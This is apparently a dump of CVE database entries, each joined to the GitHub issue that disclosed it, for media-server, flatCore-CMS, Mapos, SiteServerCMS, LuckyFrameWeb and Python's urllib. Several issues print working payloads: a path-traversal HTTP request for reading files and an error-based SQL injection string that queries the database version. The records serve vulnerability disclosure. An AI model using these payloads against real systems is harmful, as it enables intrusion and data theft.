"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"416"
] | 416 | https://github.com/ireader/media-server/issues/235 | [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"ireader",
"media-server"
] | Firstly, make the librtmp RELEASE to avoid it exit early because of assert.
And then, run the rtmp server using test with command `test -c rtmp_server_forward_aio_test 127.0.0.1 1935`
After server run, push flow to server with something like `ffmpeg -re -i source.flv -c copy -f flv -y rtmp://localhost/live/livestream`
Finally, send poc message to server with command `python3 sender.py 127.0.0.1 1935 poc`. [The attachment](https://github.com/ireader/media-server/files/9260186/poc.zip) is script and poc file.
After send the poc message, the server execute an UAF and finally crash.
| [Report] server UAF when client send poc message | https://api.github.com/repos/ireader/media-server/issues/235/comments | 4 | 2022-08-04T13:53:52Z | 2022-08-06T13:01:08Z | https://github.com/ireader/media-server/issues/235 | 1,328,676,804 | 235 | 4,727 |
CVE-2021-40555 | 2023-02-16T16:15:11.850 | Cross site scripting (XSS) vulnerability in flatCore-CMS 2.2.15 allows attackers to execute arbitrary code via description field on the new page creation form. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/flatCore/flatCore-CMS/issues/56"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/flatCore/flatCore-CMS/issues/56"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:flatcore:flatcore:2.0.7:*:*:*:*:*:*:*",
"matchCriteriaId": "646AEE91-5DA0-417C-9489-5B2AC75E7D70",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/flatCore/flatCore-CMS/issues/56 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"flatCore",
"flatCore-CMS"
] | **Describe the bug**
An user with page creation/edition can create an XSS payload in `description` field to trigger XSS when view all page from admin panel
**To Reproduce**
Steps to reproduce the behavior:
1. Click on 'Create New Page'
2. Go to 'Meta Tags' tab
3. In the 'description' section, insert arbitrary XSS payload
4. Go to 'See all page'
5. See error
**Expected behavior**
The XSS payload will be triggered for anyone who view this page description (esspecially admin account).
**Screenshots**

**Desktop (please complete the following information):**
- OS: tested on kali linux
- Browser: tested on firefox
- Version: 2.0.7
**video PoC**
https://youtu.be/XkjPdJvnMQ0
**Additional context**
This bug can be exploited by anyone has edit/create page privileges | XSS in page description | https://api.github.com/repos/flatCore/flatCore-CMS/issues/56/comments | 1 | 2021-08-30T03:18:08Z | 2021-09-15T16:40:00Z | https://github.com/flatCore/flatCore-CMS/issues/56 | 982,333,016 | 56 | 4,728 |
CVE-2022-48324 | 2023-02-16T21:15:14.023 | Multiple Cross Site Scripting (XSS) vulnerabilities in Mapos 4.39.0 allow attackers to execute arbitrary code. Affects the following parameters: (1) pesquisa, (2) data, (3) data2, (4) nome, (5) descricao, (6) idDocumentos, (7) id in file application/controllers/Arquivos.php; (8) senha, (9) nomeCliente, (10) contato, (11) documento, (12) telefone, (13) celular, (14) email, (15) rua, (16) numero, (17) complemento, (18) bairro, (19) cidade, (20) estado, (21) cep, (22) idClientes, (23) id in file application/controllers/Clientes.php; (24) id, (25) tipo, (26) forma_pagamento, (27) gateway_de_pagamento, (28) excluir_id, (29) confirma_id, (30) cancela_id in file application/controllers/Cobrancas.php; (31) vencimento_de, (32) vencimento_ate, (33) cliente, (34) tipo, (35) status, (36) valor_desconto, (37) desconto, (38) periodo, (39) per_page, (40) urlAtual, (41) vencimento, (42) recebimento, (43) valor, (44) recebido, (45) formaPgto, (46) desconto_parc, (47) entrada, (48) qtdparcelas_parc, (49) valor_parc, (50) dia_pgto, (51) dia_base_pgto, (52) comissao, (53) descricao_parc, (54) cliente_parc, (55) observacoes_parc, (56) formaPgto_parc, (57) tipo_parc, (58) pagamento, (59) pago, (60) valor_desconto_editar, (61) descricao, (62) fornecedor, (63) observacoes, (64) id in file application/controllers/Financeiro.php; (65) refGarantia, (66) textoGarantia, (67) idGarantias in file application/controllers/Garantias.php; (68) email, (69) senha in file application/controllers/Login.php. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://gist.github.com/enferas/7c7f0a3c6cb30939d9039043c0b86ea8"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/RamonSilva20/mapos/issues/2010"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "https://github.com/RamonSilva20/mapos/pull/2015#pullrequestreview-1271395780"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://gist.github.com/enferas/7c7f0a3c6cb30939d9039043c0b86ea8"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/RamonSilva20/mapos/issues/2010"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "https://github.com/RamonSilva20/mapos/pull/2015#pullrequestreview-1271395780"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:mapos:map-os:4.39.0:*:*:*:*:*:*:*",
"matchCriteriaId": "93DA3D00-8D6F-4C46-9653-9412E94F4580",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/RamonSilva20/mapos/issues/2010 | [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"RamonSilva20",
"mapos"
] | Hello,
I would like to report for some XSS vulnerabilities.
For example,
'telefone' is saved in the DB, then it is retrieved and printed in the view.
In file mapos-master\application\controllers\Clientes.php
```php
$data = [
//...
'telefone' => $this->input->post('telefone'),
//...
];
if ($this->clientes_model->edit('clientes', $data, 'idClientes', $this->input->post('idClientes')) == true) {
//....
}
```
```php
public function edit($table, $data, $fieldID, $ID)
{
$this->db->where($fieldID, $ID);
$this->db->update($table, $data);
if ($this->db->affected_rows() >= 0) {
return true;
}
return false;
}
```
In file mapos-master\application\controllers\Relatorios.php
```php
$data['clientes'] = $this->Relatorios_model->clientesCustom($dataInicial, $dataFinal, $this->input->get('tipocliente'));
//...
$data['topo'] = $this->load->view('relatorios/imprimir/imprimirTopo', $data, true);
```
```php
public function clientesCustom($dataInicial = null, $dataFinal = null, $tipo = null)
{
$whereData = '';
if ($dataInicial != null) {
$whereData .= "AND dataCadastro >= " . $this->db->escape($dataInicial);
}
if ($dataFinal != null) {
$whereData .= "AND dataCadastro <= " . $this->db->escape($dataFinal);
}
if ($tipo != null) {
$whereData .= "AND fornecedor = " . $this->db->escape($tipo);
}
$query = "SELECT * FROM clientes WHERE dataCadastro $whereData ORDER BY nomeCliente";
return $this->db->query($query, [$dataInicial, $dataFinal])->result();
}
```
In file
```php
<?php foreach ($clientes as $c) : ?>
<td align="center"><?= $c->telefone ?></td>
```
Another example,
In file mapos-master\application\views\arquivos\arquivos.php
```php
<input type="text" name="pesquisa" id="pesquisa" placeholder="Digite o nome do documento para pesquisar" class="span12" value="<?= $this->input->get('pesquisa') ?>">
```
If you agree with the vulnerabilities, I will report the other vulnerabilities. | Multiple possible XSS vulnerabilities | https://api.github.com/repos/RamonSilva20/mapos/issues/2010/comments | 4 | 2022-12-25T22:27:05Z | 2023-02-04T00:09:49Z | https://github.com/RamonSilva20/mapos/issues/2010 | 1,510,430,085 | 2,010 | 4,729 |
CVE-2022-44299 | 2023-02-16T22:15:10.980 | SiteServerCMS 7.1.3 sscms has a file read vulnerability. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 1.2,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/siteserver/cms/issues/3491"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/siteserver/cms/issues/3491"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sscms:siteserver_cms:7.1.3:*:*:*:*:*:*:*",
"matchCriteriaId": "4A886B48-6FEC-416B-B8E7-2AE79A6563E1",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"22"
] | 22 | https://github.com/siteserver/cms/issues/3491 | [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"siteserver",
"cms"
] | Vulnerability conditions
SSCMS v7.1.3 +mysql+administrator privileges
Vulnerability details
1. Code analysis found /api/admin/cms/templates/templatesAssetsEditor?directoryPath=&fileName=
An arbitrary file read vulnerability exists in the interface
code analysis process
\SSCMS.Web\Controllers\Admin\Cms\Templates\TemplatesAssetsEditorController.Get.cs
Enter and find that the FileName parameter is controllable and there is no filtering to pass into the ReadTextAsync method
<img width="432" alt="image" src="https://user-images.githubusercontent.com/49689234/197456720-b938e3c0-3b9f-430e-8182-f00ff7698377.png">
The entry method discovery is to read out the cultural content, resulting in a file read vulnerability.
<img width="432" alt="image" src="https://user-images.githubusercontent.com/49689234/197456790-2fb53f65-6753-4ffc-94bf-5226bef14cb6.png">
Vulnerability verification
An exp packet occurs after logging in to the background to obtain administrator credentials
`
GET /api/admin/cms/templates/templatesAssetsEditor?directoryPath=&fileName=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini&fileType=html&siteId=1 HTTP/1.1
Host: 192.168.3.129
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.9
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1laWQiOiIxIiwibmFtZSI6ImFkbWluIiwicm9sZSI6IkFkbWluaXN0cmF0b3IiLCJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dzLzIwMDgvMDYvaWRlbnRpdHkvY2xhaW1zL2lzcGVyc2lzdGVudCI6IkZhbHNlIiwibmJmIjoxNjY2MDY1NDYwLCJleHAiOjE2NjYxNTE4NjAsImlhdCI6MTY2NjA2NTQ2MH0.C_5BVy0Tlv-s9n8Nq2zgummkzvn50prSoOefuRVhBR8
Cookie: .AspNetCore.Antiforgery.63-E5AgGJCk=CfDJ8M6RIMVIA85OqO7ajAvAmn0W_d4giFi-UZleDB9SmjuNjqZshLg6aw57gScnZlpH6U67ohL01F-C9bjGigmapHHvA5s3qiVH_pJSxx6-DoVIkm0H9mRiZ7vnlUqgrXXLDHrtcZvMrPva6Cv41qAIV-I
Referer: http://192.168.3.129/ss-admin/cms/templatesAssetsEditor/?siteId=1&directoryPath=&fileName=&fileType=html&tabName=dd25719b-c34e-40df-883f-6a991a23d826
Accept-Encoding: gzip
`
<img width="432" alt="image" src="https://user-images.githubusercontent.com/49689234/197456898-916e8177-d377-445b-bd46-64062237f56c.png">
| background file reading | https://api.github.com/repos/siteserver/cms/issues/3491/comments | 2 | 2022-10-24T05:52:49Z | 2023-01-11T10:11:58Z | https://github.com/siteserver/cms/issues/3491 | 1,420,260,617 | 3,491 | 4,730 |
CVE-2023-24219 | 2023-02-17T07:15:11.817 | LuckyframeWEB v3.5 was discovered to contain a SQL injection vulnerability via the dataScope parameter at /system/UserMapper.xml. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/seagull1985/LuckyFrameWeb/issues/24"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/seagull1985/LuckyFrameWeb/issues/24"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:luckyframe:luckyframeweb:3.5:*:*:*:*:luckyframe:*:*",
"matchCriteriaId": "3F319797-431B-452C-8880-E798AAF1F005",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/seagull1985/LuckyFrameWeb/issues/24 | [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"seagull1985",
"LuckyFrameWeb"
] | src/main/resources/mybatis/system/UserMapper.xml
There is a ${} in this mapper

Search selectUserList to see where the this select id is used:

UserController.java
Query user information:

Follow up the selectUserList method to see the specific implementation:
UserServiceImpl.java

The parameters in the User are passed into the mapper for SQL operation. Because the datascope is controllable, the vulnerability is generated
Verification:
Splice URL and parameters according to code:
```bash
params[dataScope]=
```
Use error injection to query the database version:
```bash
params[dataScope]=and+extractvalue(1,concat(0x7e,substring((select+version()),1,32),0x7e))
```

Select database name:

| sql inject 3 | https://api.github.com/repos/seagull1985/LuckyFrameWeb/issues/24/comments | 0 | 2023-01-16T02:09:10Z | 2023-01-16T02:09:10Z | https://github.com/seagull1985/LuckyFrameWeb/issues/24 | 1,534,138,756 | 24 | 4,731 |
CVE-2023-24220 | 2023-02-17T07:15:11.990 | LuckyframeWEB v3.5 was discovered to contain a SQL injection vulnerability via the dataScope parameter at /system/RoleMapper.xml. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/seagull1985/LuckyFrameWeb/issues/22"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/seagull1985/LuckyFrameWeb/issues/22"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:luckyframe:luckyframeweb:3.5:*:*:*:*:luckyframe:*:*",
"matchCriteriaId": "3F319797-431B-452C-8880-E798AAF1F005",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/seagull1985/LuckyFrameWeb/issues/22 | [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"seagull1985",
"LuckyFrameWeb"
] | src/main/resources/mybatis/system/RoleMapper.xml
There is a ${} in this mapper
```java
<if test="deptId != null and deptId != 0">
AND (u.dept_id = #{deptId} OR u.dept_id IN ( SELECT t.dept_id FROM sys_dept t WHERE FIND_IN_SET (#{deptId},ancestors) ))
</if>
<!-- 数据范围过滤 -->
${params.dataScope}
</select>
```
Search `selectUserList` to see where the this `select id` is used:

Query user information:
src/main/java/com/luckyframe/project/system/role/controller/RoleController.java

Follow up the selectUserList method to see the specific implementation:
src/main/java/com/luckyframe/project/system/role/service/RoleServiceImpl.java

The parameters in the User are passed into the mapper for SQL operation. Because the datascope is controllable, the vulnerability is generated

Verification:
Splice URL and parameters according to code:
```bash
params[dataScope]=
```
Use error injection to query the database version:
```bash
params[dataScope]=and+extractvalue(1,concat(0x7e,substring((select+version()),1,32),0x7e))
```

Select database name:

| sql inject 1 | https://api.github.com/repos/seagull1985/LuckyFrameWeb/issues/22/comments | 0 | 2023-01-16T02:09:02Z | 2023-01-16T02:22:38Z | https://github.com/seagull1985/LuckyFrameWeb/issues/22 | 1,534,138,644 | 22 | 4,732 |
CVE-2023-24221 | 2023-02-17T07:15:12.160 | LuckyframeWEB v3.5 was discovered to contain a SQL injection vulnerability via the dataScope parameter at /system/DeptMapper.xml. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/seagull1985/LuckyFrameWeb/issues/23"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/seagull1985/LuckyFrameWeb/issues/23"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:luckyframe:luckyframeweb:3.5:*:*:*:*:luckyframe:*:*",
"matchCriteriaId": "3F319797-431B-452C-8880-E798AAF1F005",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/seagull1985/LuckyFrameWeb/issues/23 | [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"seagull1985",
"LuckyFrameWeb"
] | src/main/resources/mybatis/system/DeptMapper.xml
There is a ${} in this mapper

Search selectDeptList to see where the this select id is used:

/DeptController.java
Query dept information:

Follow up the selectDeptList method to see the specific implementation:
/DeptServiceImpl.java

The parameters in the Dept are passed into the mapper for SQL operation. Because the datascope is controllable, the vulnerability is generated

Verification:
Splice URL and parameters according to code:
```bash
params[dataScope]=
```
Use error injection to query the database version:
```bash
params[dataScope]=and+extractvalue(1,concat(0x7e,substring((select+version()),1,32),0x7e))
```

Select database name:

| sql inject 2 | https://api.github.com/repos/seagull1985/LuckyFrameWeb/issues/23/comments | 0 | 2023-01-16T02:09:07Z | 2023-01-16T02:09:07Z | https://github.com/seagull1985/LuckyFrameWeb/issues/23 | 1,534,138,697 | 23 | 4,733 |
CVE-2023-24329 | 2023-02-17T15:15:12.243 | An issue in the urllib.parse component of Python before 3.11.4 allows attackers to bypass blocklisting methods by supplying a URL that starts with blank characters. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/python/cpython/issues/102153"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch"
],
"url": "https://github.com/python/cpython/pull/99421"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.debian.org/debian-lts-announce/2023/09/msg00022.html"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6PEVICI7YNGGMSL3UCMWGE66QFLATH72/"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/DSL6NSOAXWBJJ67XPLSSC74MNKZF3BBO/"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/EM2XLZSTXG44TMFXF4E6VTGKR2MQCW3G/"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/F2NY75GFDZ5T6YPN44D3VMFT5SUVTOTG/"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GR5US3BYILYJ4SKBV6YBNPRUBAL5P2CN/"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/H23OSKC6UG6IWOQAUPW74YUHWRWVXJP7/"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JZTLGV2HYFF4AMYJL25VDIGAIHCU7UPA/"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LWC4WGXER5P6Q75RFGL7QUTPP3N5JR7T/"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MZEHSXSCMA4WWQKXT6QV7AAR6SWNZ2VP/"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/O5SP4RT3RRS434ZS2HQKQJ3VZW7YPKYR/"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/OHHJHJRLEF3TDT2K3676CAUVRDD4CCMR/"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PEUN6T22UJFXR7J5F6UUHCXXPKJ2DVHI/"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PURM5CFDABEWAIWZFD2MQ7ZJGCPYSQ44/"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/Q3J5N24ECS4B6MJDRO6UAYU6GPLYBDCL/"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QRQHN7RWJQJHYP6E5EKESOYP5VDSHZG4/"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RA2MBEEES6L46OD64OBSVUUMGKNGMOWW/"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/T4IDB5OAR5Y4UK3HLMZBW4WEL2B7YFMJ/"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TZH26JGNZ5XYPZ5SAU3NKSBSPRE5OHTG/"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/U2MZOJYGFCB5PPT6AKMAU72N7QOYWLBP/"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UONZWLB4QVLQIY5CPDLEUEKH6WX4VQMC/"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WTOAUJNDWZDRWVSXJ354AYZYKRMT56HU/"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Mitigation",
"Technical Description",
"Third Party Advisory"
],
"url": "https://pointernull.com/security/python-url-parse-problem.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://security.netapp.com/advisory/ntap-20230324-0004/"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://www.kb.cert.org/vuls/id/127587"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/python/cpython/issues/102153"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch"
],
"url": "https://github.com/python/cpython/pull/99421"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.debian.org/debian-lts-announce/2023/09/msg00022.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6PEVICI7YNGGMSL3UCMWGE66QFLATH72/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/DSL6NSOAXWBJJ67XPLSSC74MNKZF3BBO/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/EM2XLZSTXG44TMFXF4E6VTGKR2MQCW3G/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/F2NY75GFDZ5T6YPN44D3VMFT5SUVTOTG/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GR5US3BYILYJ4SKBV6YBNPRUBAL5P2CN/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/H23OSKC6UG6IWOQAUPW74YUHWRWVXJP7/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JZTLGV2HYFF4AMYJL25VDIGAIHCU7UPA/"
},
{
